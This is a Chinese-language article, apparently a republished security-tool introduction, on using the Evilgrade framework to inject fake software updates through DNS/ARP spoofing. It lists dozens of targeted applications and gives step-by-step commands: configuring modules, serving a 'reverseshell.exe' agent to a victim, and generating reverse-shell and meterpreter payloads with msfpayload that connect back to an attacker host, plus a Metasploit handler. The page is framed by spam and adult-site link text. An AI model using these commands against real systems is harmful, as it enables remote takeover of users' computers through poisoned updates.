成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何使用Evilgrade測試應用程序的升級機制是否安全

安全 數據安全
Evilgrade是一款功能強大的模塊化框架,該框架允許廣大研究人員通過向目標應用程序注入偽造的更新代碼,并利用存在安全問題的更新實現機制來測試目標升級更新功能的安全性。該工具提供了預構建的代理以及支持快速測試的默認工作配置。

關于Evilgrade

Evilgrade是一款功能強大的模塊化框架,該框架允許廣大研究人員通過向目標應用程序注入偽造的更新代碼,并利用存在安全問題的更新實現機制來測試目標升級更新功能的安全性。該工具提供了預構建的代理以及支持快速測試的默認工作配置。除此之外,該工具還擁有自己的WebServer和DNSServer模塊。

工具使用場景

內部場景

1、內部DNS訪問;

2、ARP欺騙;

3、DNS緩存投毒;

4、DHCP欺騙;

5、TCP劫持;

6、Wi-Fi訪問點偽造;

外部場景

1、內部DNS訪問;

2、DNS緩存投毒;

實現的模塊

  • Freerip 3.30
  • Jet photo 4.7.2
  • Teamviewer 5.1.9385
  • ISOpen 4.5.0
  • Istat.
  • Gom 2.1.25.5015
  • Atube catcher 1.0.300
  • Vidbox 7.5
  • Ccleaner 2.30.1130
  • Fcleaner 1.2.9.409
  • Allmynotes 1.26
  • Notepad++ 5.8.2
  • Java 1.6.0_22 winxp/win7
  • aMSN 0.98.3
  • Appleupdate <= 2.1.1.116 ( Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)
  • Mirc 7.14
  • Windows update (ie6 lastversion, ie7 7.0.5730.13, ie8 8.0.60001.18702)
  • Dap 9.5.0.3
  • Winscp 4.2.9
  • AutoIt Script 3.3.6.1
  • Clamwin 0.96.0.1
  • AppTapp Installer 3.11 (Iphone/Itunes)
  • getjar (facebook.com)
  • Google Analytics Javascript injection
  • Speedbit Optimizer 3.0 / Video Acceleration 2.2.1.8
  • Winamp 5.581
  • TechTracker (cnet) 1.3.1 (Build 55)
  • Nokiasoftware firmware update 2.4.8es
  • Nokia firmware v20.2.011
  • BSplayer 2.53.1034
  • Apt ( < Ubuntu 10.04 LTS)
  • Ubertwitter 4.6 (0.971)
  • Blackberry Facebook 1.7.0.22 | Twitter 1.0.0.45
  • Cpan 1.9402
  • VirtualBox (3.2.8 )
  • Express talk
  • Filezilla
  • Flashget
  • Miranda
  • Orbit
  • Photoscape.
  • Panda Antirootkit
  • Skype
  • Sunbelt
  • Superantispyware
  • Trillian <= 5.0.0.26
  • Adium 1.3.10 (Sparkle Framework)
  • VMware
  • ...

工具下載

廣大研究人員可以使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/infobyte/evilgrade.git

工具使用

下面給出的是工具的幫助信息:

evilgrade>help

Type 'help command' for more detailed help on a command.

Commands:

configure - 配置模塊名稱

exit - 退出程序

help - 輸出工具幫助信息

reload - 重新加載并更新所有模塊

restart - 重啟Web服務器

set - 配置變量

show - 顯示對象信息

start - 開啟Web服務器

status - 獲取Web服務器窗臺

stop - 停止Web服務器

version - 顯示框架版本



Object:

options - 顯示當前模塊的選項

vhosts - 顯示當前模塊的VirtualHosts

modules - 列舉所有可用的模塊

active - 顯示活動模塊

列舉實現的模塊:

evilgrade>show modules



List of modules:

===============



...

...

...



- 63 modules available.

配置指定模塊:

evilgrade>conf sunjava

evilgrade(sunjava)>

開啟服務(DNS服務器和WebServer):

evilgrade>start

evilgrade>

[28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...

evilgrade>

[28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...



#### Waiting for victims



evilgrade>

[25/7/2008:4:58:25] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/update/[.\\d]+/map\\-[.\\d]+.xml"

evilgrade>

[25/7/2008:4:58:26] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: "^/java_update.xml\$"

evilgrade>

[25/7/2008:4:58:39] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Request: ".exe"

evilgrade>

[25/7/2008:4:58:40] - [WEBSERVER] - [modules::sunjava] - [192.168.233.10] - Agent sent: "./agent/reverseshell.exe"

顯示狀態和日志:

evilgrade>show status

Webserver (pid 4134) already running



Users status:

============



.---------------------------------------------------------------------------------------------------------------.

| Client | Module | Status | Md5,Cmd,File |

+----------------+------------------+--------+------------------------------------------------------------------+

| 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" |

'----------------+------------------+--------+------------------------------------------------------------------'

工具高級使用

使用場景一

evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'

在這種情況下,對于每個所需的更新二進制文件,我們都可以使用 "windows/shell_reverse_tcp"這個Payload來生成偽造的更新代碼,同時使用一個反向Shell連接到192.168.233.2:4141。<%OUT%><%OUT>標簽專門來檢測輸出二進制文件的生成位置。

比如說,如果我們運行下列命令:

evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'

那么每當我們收到一個二進制請求時,Evilgrade將編譯該行并執行最終字符串"./generatebin -o /tmp/update(random).exe",然后生成不同的代理。

使用場景二

在Evilgrade外運行:

[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe

在Evilgrade內運行:

evilgrade(sunjava)>set agent /tmp/reverse-shell.exe

生成好Payload之后,我們將得到多個處理器Handler來監聽之前分配的LHOST:

[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E

[*] Started reverse handler on 192.168.100.2:4444

[*] Starting the payload handler...

項目地址

Evilgrade:【GitHub傳送門】

參考資料

http://www.faradaysec.com/

責任編輯:武曉燕 來源: FreeBuf.COM??
相關推薦

2022-12-22 08:01:09

Vue測試庫測試

2023-08-11 07:59:15

2022-02-21 14:41:21

APIWeb安全

2009-07-03 06:57:32

2010-12-27 17:04:07

應用程序版本升級

2011-08-05 09:59:54

2014-02-19 15:38:42

2022-06-22 09:00:00

安全編程語言工具

2013-11-19 15:35:01

2009-08-27 11:40:43

ibmdw云計算

2021-07-20 09:44:34

云原生應用程序安全云安全

2009-12-21 09:54:54

Web應用程序安全測試

2010-08-02 23:20:24

2013-10-31 10:44:54

IDE工具

2009-07-01 18:24:59

JSP應用程序JMeter

2012-05-29 10:04:08

2011-02-13 14:36:35

2013-02-18 16:12:55

2023-06-28 07:21:51

KoodousFinAPI密鑰

2018-09-30 15:58:34

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 国产精品免费视频一区 | 综合精品在线 | 欧美日日 | 国产视频日韩 | 国产免费一区二区三区免费视频 | 亚洲国产精品视频一区 | 色av一区| 91亚洲一区 | 天天射中文 | av看看| 91在线视频网址 | 国产亚洲一区二区三区在线观看 | 网色| 日韩欧美国产精品一区二区三区 | 色悠悠久 | 电影午夜精品一区二区三区 | 本地毛片 | 久久久久久久国产精品 | 精品国产精品一区二区夜夜嗨 | 亚洲男人天堂 | 最近最新中文字幕 | 欧美一区二区三 | 九九热这里 | aaa在线观看| 久草网址 | 久久中文字幕一区 | 色999视频| 一区二区三区视频在线观看 | 国产精品免费av | 久久久久久91 | 国产亚洲精品精品国产亚洲综合 | 久久91 | 日韩毛片在线观看 | 国产一区二区三区四区 | 亚洲国产精品成人无久久精品 | 国产在线视频一区二区 | 一区二区三区亚洲精品国 | 亚洲福利网 | 国产在线播 | 久久国产电影 | av一区在线 |